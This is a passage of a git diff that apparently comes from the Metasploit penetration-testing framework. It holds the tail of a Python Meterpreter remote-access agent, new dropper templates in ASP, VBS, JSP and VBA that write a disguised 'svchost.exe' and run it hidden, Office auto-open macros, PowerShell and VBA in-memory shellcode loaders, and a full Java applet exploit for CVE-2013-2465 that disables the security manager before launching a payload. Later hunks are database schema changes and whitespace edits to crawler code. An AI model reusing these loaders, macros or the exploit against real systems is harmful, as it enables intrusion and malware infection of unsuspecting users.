ERROR_FAILURE, response + channel = self.channels[channel_id] + if isinstance(channel, file): + channel.close() + elif isinstance(channel, subprocess.Popen): + channel.kill() + elif isinstance(s, socket._socketobject): + channel.close() + else: + return ERROR_FAILURE, response + del self.channels[channel_id] + if channel_id in self.interact_channels: + self.interact_channels.remove(channel_id) + return ERROR_SUCCESS, response + + def _core_channel_eof(self, request, response): + channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value'] + if channel_id not in self.channels: + return ERROR_FAILURE, response + channel = self.channels[channel_id] + result = False + if isinstance(channel, file): + result = channel.tell() == os.fstat(channel.fileno()).st_size + response += tlv_pack(TLV_TYPE_BOOL, result) + return ERROR_SUCCESS, response + + def _core_channel_interact(self, request, response): + channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value'] + if channel_id not in self.channels: + return ERROR_FAILURE, response + channel = self.channels[channel_id] + toggle = packet_get_tlv(request, TLV_TYPE_BOOL)['value'] + if toggle: + if channel_id in self.interact_channels: + self.interact_channels.remove(channel_id) + else: + self.interact_channels.append(channel_id) + elif channel_id in self.interact_channels: + self.interact_channels.remove(channel_id) + return ERROR_SUCCESS, response + + def _core_channel_read(self, request, response): + channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value'] + length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value'] + if channel_id not in self.channels: + return ERROR_FAILURE, response + channel = self.channels[channel_id] + data = '' + if isinstance(channel, file): + data = channel.read(length) + elif isinstance(channel, STDProcess): + if channel.poll() != None: + self.handle_dead_resource_channel(channel_id) + if channel.stdout_reader.is_read_ready(): + data = channel.stdout_reader.read(length) + elif isinstance(s, socket._socketobject): + data = channel.recv(length) + else: + return ERROR_FAILURE, response + response += tlv_pack(TLV_TYPE_CHANNEL_DATA, data) + return ERROR_SUCCESS, response + + def _core_channel_write(self, request, response): + channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value'] + channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value'] + length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value'] + if channel_id not in self.channels: + return ERROR_FAILURE, response + channel = self.channels[channel_id] + l = len(channel_data) + if isinstance(channel, file): + channel.write(channel_data) + elif isinstance(channel, subprocess.Popen): + if channel.poll() != None: + self.handle_dead_resource_channel(channel_id) + return ERROR_FAILURE, response + channel.stdin.write(channel_data) + elif isinstance(s, socket._socketobject): + try: + l = channel.send(channel_data) + except socket.error: + channel.close() + self.handle_dead_resource_channel(channel_id) + return ERROR_FAILURE, response + else: + return ERROR_FAILURE, response + response += tlv_pack(TLV_TYPE_LENGTH, l) + return ERROR_SUCCESS, response + + def create_response(self, request): + resp = struct.pack('>I', PACKET_TYPE_RESPONSE) + method_tlv = packet_get_tlv(request, TLV_TYPE_METHOD) + resp += tlv_pack(method_tlv) + + reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID) + resp += tlv_pack(reqid_tlv) + + if method_tlv['value'] in self.extension_functions: + handler = self.extension_functions[method_tlv['value']] + try: + result, resp = handler(request, resp) + except Exception, err: + result = ERROR_FAILURE + else: + result = ERROR_FAILURE + resp += tlv_pack(TLV_TYPE_RESULT, result) + resp = struct.pack('>I', len(resp) + 4) + resp + return resp + +if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0): + if hasattr(os, 'setsid'): + os.setsid() + met = PythonMeterpreter(s) + met.run() diff --git a/data/meterpreter/metsrv.dll b/data/meterpreter/metsrv.dll index d35c3ba176f93..2c0bd62c7f249 100755 Binary files a/data/meterpreter/metsrv.dll and b/data/meterpreter/metsrv.dll differ diff --git a/data/meterpreter/metsrv.x64.dll b/data/meterpreter/metsrv.x64.dll index 66008646dd79f..90716b66de656 100755 Binary files a/data/meterpreter/metsrv.x64.dll and b/data/meterpreter/metsrv.x64.dll differ diff --git a/data/templates/scripts/to_exe.asp.template b/data/templates/scripts/to_exe.asp.template new file mode 100644 index 0000000000000..7fd20621f637d --- /dev/null +++ b/data/templates/scripts/to_exe.asp.template @@ -0,0 +1,24 @@ +<%% @language="VBScript" %%> +<%% + Sub %{var_func}() + %{var_shellcode} + Dim %{var_obj} + Set %{var_obj} = CreateObject("Scripting.FileSystemObject") + Dim %{var_stream} + Dim %{var_tempdir} + Dim %{var_tempexe} + Dim %{var_basedir} + Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2) + %{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName() + %{var_obj}.CreateFolder(%{var_basedir}) + %{var_tempexe} = %{var_basedir} & "\" & "svchost.exe" + Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe},2,0) + %{var_stream}.Write %{var_bytes} + %{var_stream}.Close + Dim %{var_shell} + Set %{var_shell} = CreateObject("Wscript.Shell") + %{var_shell}.run %{var_tempexe}, 0, false + End Sub + + %{var_func} +%%> diff --git a/data/templates/scripts/to_exe.aspx.template b/data/templates/scripts/to_exe.aspx.template new file mode 100644 index 0000000000000..16c63da578f74 --- /dev/null +++ b/data/templates/scripts/to_exe.aspx.template @@ -0,0 +1,30 @@ +<%%@ Page Language="C#" AutoEventWireup="true" %%> +<%%@ Import Namespace="System.IO" %%> + diff --git a/data/templates/scripts/to_exe.vba.template b/data/templates/scripts/to_exe.vba.template new file mode 100644 index 0000000000000..4b52a426ed229 --- /dev/null +++ b/data/templates/scripts/to_exe.vba.template @@ -0,0 +1,81 @@ +'************************************************************** +'* +'* This code is now split into two pieces: +'* 1. The Macro. This must be copied into the Office document +'* macro editor. This macro will run on startup. +'* +'* 2. The Data. The hex dump at the end of this output must be +'* appended to the end of the document contents. +'* +'************************************************************** +'* +'* MACRO CODE +'* +'************************************************************** + +Sub Auto_Open() + %{func_name1} +End Sub + +Sub %{func_name1}() + Dim %{var_appnr} As Integer + Dim %{var_fname} As String + Dim %{var_fenvi} As String + Dim %{var_fhand} As Integer + Dim %{var_parag} As Paragraph + Dim %{var_index} As Integer + Dim %{var_gotmagic} As Boolean + Dim %{var_itemp} As Integer + Dim %{var_stemp} As String + Dim %{var_btemp} As Byte + Dim %{var_magic} as String + %{var_magic} = "%{var_magic}" + %{var_fname} = "%{filename}.exe" + %{var_fenvi} = Environ("USERPROFILE") + ChDrive (%{var_fenvi}) + ChDir (%{var_fenvi}) + %{var_fhand} = FreeFile() + Open %{var_fname} For Binary As %{var_fhand} + For Each %{var_parag} in ActiveDocument.Paragraphs + DoEvents + %{var_stemp} = %{var_parag}.Range.Text + If (%{var_gotmagic} = True) Then + %{var_index} = 1 + While (%{var_index} < Len(%{var_stemp})) + %{var_btemp} = Mid(%{var_stemp},%{var_index},4) + Put #%{var_fhand}, , %{var_btemp} + %{var_index} = %{var_index} + 4 + Wend + ElseIf (InStr(1,%{var_stemp},%{var_magic}) > 0 And Len(%{var_stemp}) > 0) Then + %{var_gotmagic} = True + End If + Next + Close #%{var_fhand} + %{func_name2}(%{var_fname}) +End Sub + +Sub %{func_name2}(%{var_farg} As String) + Dim %{var_appnr} As Integer + Dim %{var_fenvi} As String + %{var_fenvi} = Environ("USERPROFILE") + ChDrive (%{var_fenvi}) + ChDir (%{var_fenvi}) + %{var_appnr} = Shell(%{var_farg}, vbHide) +End Sub + +Sub AutoOpen() + Auto_Open +End Sub + +Sub Workbook_Open() + Auto_Open +End Sub + +'************************************************************** +'* +'* PAYLOAD DATA +'* +'************************************************************** + +%{var_magic} +%{data} diff --git a/data/templates/scripts/to_exe.vbs.template b/data/templates/scripts/to_exe.vbs.template new file mode 100644 index 0000000000000..102d2787bb6df --- /dev/null +++ b/data/templates/scripts/to_exe.vbs.template @@ -0,0 +1,24 @@ +Function %{var_func}() +%{var_shellcode} + + Dim %{var_obj} + Set %{var_obj} = CreateObject("Scripting.FileSystemObject") + Dim %{var_stream} + Dim %{var_tempdir} + Dim %{var_tempexe} + Dim %{var_basedir} + Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2) + %{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName() + %{var_obj}.CreateFolder(%{var_basedir}) + %{var_tempexe} = %{var_basedir} & "\" & "svchost.exe" + Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false) + %{var_stream}.Write %{var_bytes} + %{var_stream}.Close + Dim %{var_shell} + Set %{var_shell} = CreateObject("Wscript.Shell") + %{var_shell}.run %{var_tempexe}, 0, true + %{var_obj}.DeleteFile(%{var_tempexe}) + %{var_obj}.DeleteFolder(%{var_basedir}) +End Function + +%{init} diff --git a/data/templates/scripts/to_exe_jsp.war.template b/data/templates/scripts/to_exe_jsp.war.template new file mode 100644 index 0000000000000..3797d576c16de --- /dev/null +++ b/data/templates/scripts/to_exe_jsp.war.template @@ -0,0 +1,49 @@ +<%%@ page import="java.io.*" %%> +<%% + String %{var_hexpath} = application.getRealPath("/") + "/%{var_hexfile}.txt"; + String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}"; + String %{var_data} = ""; + + if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) + { + %{var_exepath} = %{var_exepath}.concat(".exe"); + } + + FileInputStream %{var_inputstream} = new FileInputStream(%{var_hexpath}); + FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath}); + + int %{var_numbytes} = %{var_inputstream}.available(); + byte %{var_bytearray}[] = new byte[%{var_numbytes}]; + %{var_inputstream}.read(%{var_bytearray}); + %{var_inputstream}.close(); + byte[] %{var_bytes} = new byte[%{var_numbytes}/2]; + for (int %{var_counter} = 0; %{var_counter} < %{var_numbytes}; %{var_counter} += 2) + { + char %{var_char1} = (char) %{var_bytearray}[%{var_counter}]; + char %{var_char2} = (char) %{var_bytearray}[%{var_counter} + 1]; + int %{var_comb} = Character.digit(%{var_char1}, 16) & 0xff; + %{var_comb} <<= 4; + %{var_comb} += Character.digit(%{var_char2}, 16) & 0xff; + %{var_bytes}[%{var_counter}/2] = (byte)%{var_comb}; + } + + %{var_outputstream}.write(%{var_bytes}); + %{var_outputstream}.close(); + + if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){ + String[] %{var_fperm} = new String[3]; + %{var_fperm}[0] = "chmod"; + %{var_fperm}[1] = "+x"; + %{var_fperm}[2] = %{var_exepath}; + Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm}); + if (%{var_proc}.waitFor() == 0) { + %{var_proc} = Runtime.getRuntime().exec(%{var_exepath}); + } + + File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete(); + } + else + { + Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath}); + } +%%> diff --git a/data/templates/scripts/to_mem.vba.template b/data/templates/scripts/to_mem.vba.template new file mode 100644 index 0000000000000..8aacea695e1c4 --- /dev/null +++ b/data/templates/scripts/to_mem.vba.template @@ -0,0 +1,32 @@ +#If Vba7 Then + Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal %{var_lpThreadAttributes} As Long, ByVal %{var_dwStackSize} As Long, ByVal %{var_lpStartAddress} As LongPtr, %{var_lpParameter} As Long, ByVal %{var_dwCreationFlags} As Long, %{var_lpThreadID} As Long) As LongPtr + Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal %{var_lpAddr} As Long, ByVal %{var_lSize} As Long, ByVal %{var_flAllocationType} As Long, ByVal %{var_flProtect} As Long) As LongPtr + Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal %{var_lDest} As LongPtr, ByRef %{var_Source} As Any, ByVal %{var_Length} As Long) As LongPtr +#Else + Private Declare Function CreateThread Lib "kernel32" (ByVal %{var_lpThreadAttributes} As Long, ByVal %{var_dwStackSize} As Long, ByVal %{var_lpStartAddress} As Long, %{var_lpParameter} As Long, ByVal %{var_dwCreationFlags} As Long, %{var_lpThreadID} As Long) As Long + Private Declare Function VirtualAlloc Lib "kernel32" (ByVal %{var_lpAddr} As Long, ByVal %{var_lSize} As Long, ByVal %{var_flAllocationType} As Long, ByVal %{var_flProtect} As Long) As Long + Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal %{var_lDest} As Long, ByRef %{var_Source} As Any, ByVal %{var_Length} As Long) As Long +#EndIf + +Sub Auto_Open() + Dim %{var_myByte} As Long, %{var_myArray} As Variant, %{var_offset} As Long +#If Vba7 Then + Dim %{var_rwxpage} As LongPtr, %{var_res} As LongPtr +#Else + Dim %{var_rwxpage} As Long, %{var_res} As Long +#EndIf + %{bytes} + %{var_rwxpage} = VirtualAlloc(0, UBound(%{var_myArray}), &H1000, &H40) + For %{var_offset} = LBound(%{var_myArray}) To UBound(%{var_myArray}) + %{var_myByte} = %{var_myArray}(%{var_offset}) + %{var_res} = RtlMoveMemory(%{var_rwxpage} + %{var_offset}, %{var_myByte}, 1) + Next %{var_offset} + %{var_res} = CreateThread(0, 0, %{var_rwxpage}, 0, 0, 0) +End Sub +Sub AutoOpen() + Auto_Open +End Sub +Sub Workbook_Open() + Auto_Open +End Sub + diff --git a/data/templates/scripts/to_mem_dotnet.ps1.template b/data/templates/scripts/to_mem_dotnet.ps1.template new file mode 100644 index 0000000000000..6185274299099 --- /dev/null +++ b/data/templates/scripts/to_mem_dotnet.ps1.template @@ -0,0 +1,30 @@ +Set-StrictMode -Version 2 +$%{var_syscode} = @" + using System; + using System.Runtime.InteropServices; + namespace %{var_kernel32} { + public class func { + [Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 } + [Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 } + [Flags] public enum Time : uint { Infinite = 0xFFFFFFFF } + [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); + [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); + [DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds); + } + } +"@ + +$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider +$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters +$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location)) +$%{var_compileParams}.GenerateInMemory = $True +$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode}) + +%{shellcode} + +$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite) +if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return } +[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length) +[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0) +if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return } +$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite) diff --git a/data/templates/scripts/to_mem_old.ps1.template b/data/templates/scripts/to_mem_old.ps1.template new file mode 100644 index 0000000000000..bbd85c1bfbd83 --- /dev/null +++ b/data/templates/scripts/to_mem_old.ps1.template @@ -0,0 +1,20 @@ +$%{var_syscode} = @" +[DllImport("kernel32.dll")] +public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); +[DllImport("kernel32.dll")] +public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); +[DllImport("msvcrt.dll")] +public static extern IntPtr memset(IntPtr dest, uint src, uint count); +"@ + +$%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -namespace Win32Functions -passthru + +%{shellcode} + +$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,0x1000,[Math]::Max($%{var_code}.Length, 0x1000),0x40) + +for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) { + $%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null +} + +$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0) diff --git a/db/schema.rb b/db/schema.rb index 5f4f6d242d471..42093e67645f7 100644 --- a/db/schema.rb +++ b/db/schema.rb @@ -11,7 +11,7 @@ # # It's strongly recommended to check this file into your version control system. -ActiveRecord::Schema.define(:version => 20130604145732) do +ActiveRecord::Schema.define(:version => 20130717150737) do create_table "api_keys", :force => true do |t| t.text "token" @@ -19,30 +19,6 @@ t.datetime "updated_at", :null => false end - create_table "attachments", :force => true do |t| - t.string "name", :limit => 512 - t.binary "data" - t.string "content_type", :limit => 512 - t.boolean "inline", :default => true, :null => false - t.boolean "zip", :default => false, :null => false - t.integer "campaign_id" - end - - create_table "attachments_email_templates", :id => false, :force => true do |t| - t.integer "attachment_id" - t.integer "email_template_id" - end - - create_table "campaigns", :force => true do |t| - t.integer "workspace_id", :null => false - t.string "name", :limit => 512 - t.text "prefs" - t.integer "status", :default => 0 - t.datetime "started_at" - t.datetime "created_at", :null => false - t.datetime "updated_at", :null => false - end - create_table "clients", :force => true do |t| t.integer "host_id" t.datetime "created_at" @@ -65,24 +41,6 @@ t.string "source_type" end - create_table "email_addresses", :force => true do |t| - t.integer "campaign_id", :null => false - t.string "first_name", :limit => 512 - t.string "last_name", :limit => 512 - t.string "address", :limit => 512 - t.boolean "sent", :default => false, :null => false - t.datetime "clicked_at" - end - - create_table "email_templates", :force => true do |t| - t.string "name", :limit => 512 - t.string "subject", :limit => 1024 - t.text "body" - t.integer "parent_id" - t.integer "campaign_id" - t.text "prefs" - end - create_table "events", :force => true do |t| t.integer "workspace_id" t.integer "host_id" @@ -581,14 +539,6 @@ add_index "web_sites", ["options"], :name => "index_web_sites_on_options" add_index "web_sites", ["vhost"], :name => "index_web_sites_on_vhost" - create_table "web_templates", :force => true do |t| - t.string "name", :limit => 512 - t.string "title", :limit => 512 - t.string "body", :limit => 524288 - t.integer "campaign_id" - t.text "prefs" - end - create_table "web_vulns", :force => true do |t| t.integer "web_site_id", :null => false t.datetime "created_at", :null => false @@ -596,7 +546,7 @@ t.text "path", :null => false t.string "method", :limit => 1024, :null => false t.text "params", :null => false - t.text "pname", :null => false + t.text "pname" t.integer "risk", :null => false t.string "name", :limit => 1024, :null => false t.text "query" diff --git a/external/source/exploits/CVE-2013-2465/Exploit.java b/external/source/exploits/CVE-2013-2465/Exploit.java new file mode 100755 index 0000000000000..4e3403c4f0168 --- /dev/null +++ b/external/source/exploits/CVE-2013-2465/Exploit.java @@ -0,0 +1,197 @@ +import java.awt.image.*; +import java.awt.color.*; +import java.beans.Statement; +import java.security.*; +import metasploit.Payload; +import java.applet.Applet; + +public class Exploit extends Applet { + + public void init() { + + try { + + // try several attempts to exploit + for(int i=1; i <= 5 && System.getSecurityManager() != null; i++){ + //System.out.println("Attempt #" + i); + tryExpl(); + } + + // check results + if (System.getSecurityManager() == null) { + // execute payload + //Runtime.getRuntime().exec(_isMac ? "/Applications/Calculator.app/Contents/MacOS/Calculator":"calc.exe"); + Payload.main(null); + } + + } catch (Exception ex) { + //ex.printStackTrace(); + } + } + + public static String toHex(int i) + { + return Integer.toHexString(i); + } + + private boolean _is64 = System.getProperty("os.arch","").contains("64"); + + // we will need ColorSpace which returns 1 from getNumComponents() + class MyColorSpace extends ICC_ColorSpace + { + public MyColorSpace() + { + super(ICC_Profile.getInstance(ColorSpace.CS_sRGB)); + } + + // override getNumComponents + public int getNumComponents() + { + int res = 1; + return res; + } + } + + // we will need ComponentColorModel with the obedient isCompatibleRaster() which always returns true. + class MyColorModel extends ComponentColorModel + { + public MyColorModel() + { + super(new MyColorSpace(), new int[]{8,8,8}, false, false, 1, DataBuffer.TYPE_BYTE); + } + + // override isCompatibleRaster + public boolean isCompatibleRaster(Raster r) + { + boolean res = true; + return res; + } + } + + + private int tryExpl() + { + try { + // alloc aux vars + String name = "setSecurityManager"; + Object[] o1 = new Object[1]; + Object o2 = new Statement(System.class, name, o1); // make a dummy call for init + + // allocate byte buffer for destination Raster. + DataBufferByte dst = new DataBufferByte(16); + + // allocate the target array right after dst + int[] a = new int[8]; + // allocate an object array right after a[] + Object[] oo = new Object[7]; + + // create Statement with the restricted AccessControlContext + oo[2] = new Statement(System.class, name, o1); + + // create powerful AccessControlContext + Permissions ps = new Permissions(); + ps.add(new AllPermission()); + oo[3] = new AccessControlContext( + new ProtectionDomain[]{ + new ProtectionDomain( + new CodeSource( + new java.net.URL("file:///"), + new java.security.cert.Certificate[0] + ), + ps + ) + } + ); + + // store System.class pointer in oo[] + oo[4] = ((Statement)oo[2]).getTarget(); + + // save old a.length + int oldLen = a.length; + //System.out.println("a.length = 0x" + toHex(oldLen)); + + // create regular source image + BufferedImage bi1 = new BufferedImage(4,1, BufferedImage.TYPE_INT_ARGB); + + // prepare the sample model with "dataBitOffset" pointing outside dst[] onto a.length + MultiPixelPackedSampleModel sm = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4,1,1,4, 44 + (_is64 ? 8:0)); + // create malformed destination image based on dst[] data + WritableRaster wr = Raster.createWritableRaster(sm, dst, null); + BufferedImage bi2 = new BufferedImage(new MyColorModel(), wr, false, null); + + // prepare first pixel which will overwrite a.length + bi1.getRaster().setPixel(0,0, new int[]{-1,-1,-1,-1}); + + // call the vulnerable storeImageArray() function (see ...\jdk\src\share\native\sun\awt\medialib\awt_ImagingLib.c) + AffineTransformOp op = new AffineTransformOp(new java.awt.geom.AffineTransform(1,0,0,1,0,0), null); + op.filter(bi1, bi2); + + // check results: a.length should be overwritten by 0xFFFFFFFF + int len = a.length; + //System.out.println("a.length = 0x" + toHex(len)); + if (len == oldLen) { + // check a[] content corruption // for RnD + for(int i=0; i < len; i++) { + if (a[i] != 0) { + //System.out.println("a["+i+"] = 0x" + toHex(a[i])); + } + } + // exit + //System.out.println("error 1"); + return 1; + } + + // ok, now we can read/write outside the real a[] storage, + // lets find our Statement object and replace its private "acc" field value + + // search for oo[] after a[oldLen] + boolean found = false; + int ooLen = oo.length; + for(int i=oldLen+2; i < oldLen+32; i++) + if (a[i-1]==ooLen && a[i]==0 && a[i+1]==0 // oo[0]==null && oo[1]==null + && a[i+2]!=0 && a[i+3]!=0 && a[i+4]!=0 // oo[2,3,4] != null + && a[i+5]==0 && a[i+6]==0) // oo[5,6] == null + { + // read pointer from oo[4] + int stmTrg = a[i+4]; + // search for the Statement.target field behind oo[] + for(int j=i+7; j < i+7+64; j++){ + if (a[j] == stmTrg) { + // overwrite default Statement.acc by oo[3] ("AllPermission") + a[j-1] = a[i+3]; + found = true; + break; + } + } + if (found) break; + } + + // check results + if (!found) { + // print the memory dump on error // for RnD + String s = "a["+oldLen+"...] = "; + for(int i=oldLen; i < oldLen+32; i++) s += toHex(a[i]) + ","; + //System.out.println(s); + } else try { + + // call System.setSecurityManager(null) + ((Statement)oo[2]).execute(); + + // show results: SecurityManager should be null + } catch (Exception ex) { + //ex.printStackTrace(); + } + + //System.out.println(System.getSecurityManager() == null ? "Ok.":"Fail."); + + } catch (Exception ex) { + //ex.printStackTrace(); + } + + return 0; + } + +} + + + diff --git a/external/source/exploits/CVE-2013-2465/Makefile b/external/source/exploits/CVE-2013-2465/Makefile new file mode 100644 index 0000000000000..4ee5294f12d6f --- /dev/null +++ b/external/source/exploits/CVE-2013-2465/Makefile @@ -0,0 +1,14 @@ +CLASSES = Exploit.java + +.SUFFIXES: .java .class +.java.class: + javac -source 1.2 -target 1.2 -cp "../../../../data/java" Exploit.java + +all: $(CLASSES:.java=.class) + +install: + mv *.class ../../../../data/exploits/CVE-2013-3465/ + +clean: + rm -rf *.class + diff --git a/lib/anemone/core.rb b/lib/anemone/core.rb index 2fa01df619956..72d80f11bfa68 100644 --- a/lib/anemone/core.rb +++ b/lib/anemone/core.rb @@ -298,10 +298,10 @@ def skip_link?(link) # # Kills all active threads # - def shutdown + def shutdown @tentacles.each {|t| t.kill rescue nil } @pages = nil - end + end end end diff --git a/lib/anemone/extractors/anchors.rb b/lib/anemone/extractors/anchors.rb index 7fc9f88061350..caeb668c36954 100644 --- a/lib/anemone/extractors/anchors.rb +++ b/lib/anemone/extractors/anchors.rb @@ -1,7 +1,7 @@ class Anemone::Extractors::Anchors < Anemone::Extractors::Base - def run - doc.search( '//a[@href]' ).map { |a| a['href'] } - end + def run + doc.search( '//a[@href]' ).map { |a| a['href'] } + end end diff --git a/lib/anemone/extractors/dirbuster.rb b/lib/anemone/extractors/dirbuster.rb index 8199bbfb196fd..7330615ef84cb 100644 --- a/lib/anemone/extractors/dirbuster.rb +++ b/lib/anemone/extractors/dirbuster.rb @@ -1,12 +1,12 @@ class Anemone::Extractors::Dirbuster < Anemone::Extractors::Base - def run - return [] if page.code.to_i != 200 + def run + return [] if page.code.to_i != 200 - @@dirs ||= nil + @@dirs ||= nil - return @@dirs if @@dirs - @@dirs = IO.read( File.dirname( __FILE__ ) + '/dirbuster/directories' ).split( "\n" ) - end - + return @@dirs if @@dirs + @@dirs = IO.read( File.dirname( __FILE__ ) + '/dirbuster/directories' ).split( "\n" ) + end + end diff --git a/lib/anemone/extractors/forms.rb b/lib/anemone/extractors/forms.rb index 33bd08d9af721..c15e61bb8e916 100644 --- a/lib/anemone/extractors/forms.rb +++ b/lib/anemone/extractors/forms.rb @@ -1,7 +1,7 @@ class Anemone::Extractors::Forms < Anemone::Extractors::Base - def run - doc.search( '//form[@action]' ).map { |a| a['action'] } - end - + def run + doc.search( '//form[@action]' ).map { |a| a['action'] } + end + end diff --git a/lib/anemone/extractors/frames.rb b/lib/anemone/extractors/frames.rb index 9038a1851c889..8f7ac2eeb8853 100644 --- a/lib/anemone/extractors/frames.rb +++ b/lib/anemone/extractors/frames.rb @@ -1,7 +1,7 @@ class Anemone::Extractors::Frames < Anemone::Extractors::Base - def run - doc.css( 'frame', 'iframe' ).map { |a| a.attributes['src'].content rescue next } - end + def run + doc.css( 'frame', 'iframe' ).map { |a| a.attributes['src'].content rescue next } + end end diff --git a/lib/anemone/extractors/generic.rb b/lib/anemone/extractors/generic.rb index 3b81c4442adab..3ef8e46dca5e6 100644 --- a/lib/anemone/extractors/generic.rb +++ b/lib/anemone/extractors/generic.rb @@ -2,49 +2,49 @@ class Anemone::Extractors::Generic < Anemone::Extractors::Base - def run - URI.extract( doc.to_s, %w(http https) ).map do |u| - # - # This extractor needs to be a tiny bit intelligent because - # due to its generic nature it'll inevitably match some garbage. - # - # For example, if some JS code contains: - # - # var = 'http://blah.com?id=1' - # - # or - # - # var = { 'http://blah.com?id=1', 1 } - # - # - # The URI.extract call will match: - # - # http://blah.com?id=1' - # - # and - # - # http://blah.com?id=1', - # - # respectively. - # - if !includes_quotes?( u ) - u - else - if html.include?( "'#{u}" ) - u.split( '\'' ).first - elsif html.include?( "\"#{u}" ) - u.split( '"' ).first - else - u - end - end - end - rescue - [] - end + def run + URI.extract( doc.to_s, %w(http https) ).map do |u| + # + # This extractor needs to be a tiny bit intelligent because + # due to its generic nature it'll inevitably match some garbage. + # + # For example, if some JS code contains: + # + # var = 'http://blah.com?id=1' + # + # or + # + # var = { 'http://blah.com?id=1', 1 } + # + # + # The URI.extract call will match: + # + # http://blah.com?id=1' + # + # and + # + # http://blah.com?id=1', + # + # respectively. + # + if !includes_quotes?( u ) + u + else + if html.include?( "'#{u}" ) + u.split( '\'' ).first + elsif html.include?( "\"#{u}" ) + u.split( '"' ).first + else + u + end + end + end + rescue + [] + end - def includes_quotes?( url ) - url.include?( '\'' ) || url.include?( '"' ) - end + def includes_quotes?( url ) + url.include?( '\'' ) || url.include?( '"' ) + end end diff --git a/lib/anemone/extractors/links.rb b/lib/anemone/extractors/links.rb index 33eaace54e47c..57d1ad88a1741 100644 --- a/lib/anemone/extractors/links.rb +++ b/lib/anemone/extractors/links.rb @@ -1,7 +1,7 @@ class Anemone::Extractors::Links < Anemone::Extractors::Base - def run - doc.search( "//link[@href]" ).map { |a| a['href'] } - end + def run + doc.search( "//link[@href]" ).map { |a| a['href'] } + end end diff --git a/lib/anemone/extractors/meta_refresh.rb b/lib/anemone/extractors/meta_refresh.rb index 61608b416ec90..cb0c3228b12d9 100644 --- a/lib/anemone/extractors/meta_refresh.rb +++ b/lib/anemone/extractors/meta_refresh.rb @@ -1,24 +1,24 @@ class Anemone::Extractors::MetaRefresh < Anemone::Extractors::Base - def run - doc.search( "//meta[@http-equiv='refresh']" ).map do |url| - begin - _, url = url['content'].split( ';', 2 ) - next if !url - unquote( url.split( '=', 2 ).last ) - rescue - next - end - end - rescue - nil - end + def run + doc.search( "//meta[@http-equiv='refresh']" ).map do |url| + begin + _, url = url['content'].split( ';', 2 ) + next if !url + unquote( url.split( '=', 2 ).last ) + rescue + next + end + end + rescue + nil + end - def unquote( str ) - [ '\'', '"' ].each do |q| - return str[1...-1] if str.start_with?( q ) && str.end_with?( q ) - end - str - end + def unquote( str ) + [ '\'', '"' ].each do |q| + return str[1...-1] if str.start_with?( q ) && str.end_with?( q ) + end + str + end end diff --git a/lib/anemone/extractors/scripts.rb b/lib/anemone/extractors/scripts.rb index 95d1ff8b9a03a..cc26f960f7d05 100644 --- a/lib/anemone/extractors/scripts.rb +++ b/lib/anemone/extractors/scripts.rb @@ -1,7 +1,7 @@ class Anemone::Extractors::Scripts < Anemone::Extractors::Base - def run - 